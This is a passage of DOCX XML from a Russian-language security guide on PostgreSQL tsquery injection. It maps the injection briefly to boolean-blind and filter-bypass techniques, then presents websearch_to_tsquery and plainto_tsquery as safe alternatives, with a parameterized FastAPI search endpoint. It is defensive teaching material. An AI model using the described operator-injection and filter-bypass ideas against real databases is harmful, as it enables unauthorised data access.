          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant A создаёт boolean-channel через override match-логики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09356840" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t>-operator используется как обвод WHERE-фильтрации, что параллельно WAF-bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED1678" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283F4C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Text Search Functions and Operators» — https://www.postgresql.org/docs/current/textsearch-controls.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B524173" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Querying a Table» / tsquery — https://www.postgresql.org/docs/current/datatype-textsearch.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA59360" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Full Text Search» / Введение — https://www.postgresql.org/docs/current/textsearch.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14139601" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (parser source) — https://github.com/postgres/postgres/blob/master/src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E6CD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «Server-Side Request Forgery Prevention Cheat Sheet» (родственный класс — semantic injection в external parsers) — https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D518090" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SQLAlchemy Docs: «Full Text Search» — https://docs.sqlalchemy.org/en/20/dialects/postgresql.html#full-text-search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE1112" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.15.3 websearch_to_tsquery / plainto_tsquery — безопасные альтернативы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1A3A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL предоставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>три безопасные альтернативы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.15.2), которые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не парсят user-input как operator-язык</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или парсят его в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>predictable, restricted subset</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0FF56A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`plainto_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — treats input as plain text. Все operators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</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&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>игнорируются</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (заменяются на whitespace), термины AND-аются. Полностью безопасна для прямой передачи user-input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46C2BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`phraseto_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но термины должны идти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>подряд</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FOLLOWED BY вместо AND). Используется для phrase search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A9C7B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`websearch_to_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 11) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>поддерживает Google-style syntax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в restricted subset: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"phrase"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (double quotes для phrase search), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-term</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (исключение), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (case-insensitive OR). Любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>syntax-invalid input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не падает с ERROR (как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>игнорируется gracefully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это критично для безопасности (нет syntax-error канала 3.15.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505EB508" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не подраздел про уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это подраздел про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>защитный pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: migration с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрывает все варианты 3.15.2 и 3.15.4. Подраздел нужен в категории, чтобы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53C4AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   зафиксировать сравнение функций (что выбирать в каком случае)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AD19B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   показать migration pattern для существующих эндпоинтов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC00E11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   объяснить, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`plainto_tsquery` vs `websearch_to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это не «one or the other», а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разные search-UX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E88FCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Защищённый код (canonical pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E154FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/articles.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00861327"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32997D36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45654361"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8D6BF82"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417DC986" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A8F7B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A33FFC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E71B2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A708D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CBDF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1, max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FB5E4"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17D1E8E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE00602" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Безопасный шаблон: websearch_to_tsquery для user-input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5367C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBFEF51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374CC39A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               ts_rank(search_vector, websearch_to_tsquery('english', :q)) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8C83C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61265EBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ websearch_to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D7AAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582784DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY rank DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2088C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2BC4C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102916FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13636B5C"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681A6988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User может писать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin &amp; superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>два литеральных слова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ignored), не как boolean operator. Пользователь может написать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"exact phrase"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>поддерживается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как FOLLOWED BY. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — исключение. Любой syntax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r>
        <w:t>) — silently ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584F80B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сравнительная таблица функций tsquery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7"/>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="1546"/>
        <w:gridCol w:w="1702"/>
        <w:gridCol w:w="1095"/>
        <w:gridCol w:w="1150"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="2CFB61AB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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D08CA8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Функция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54FBBFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
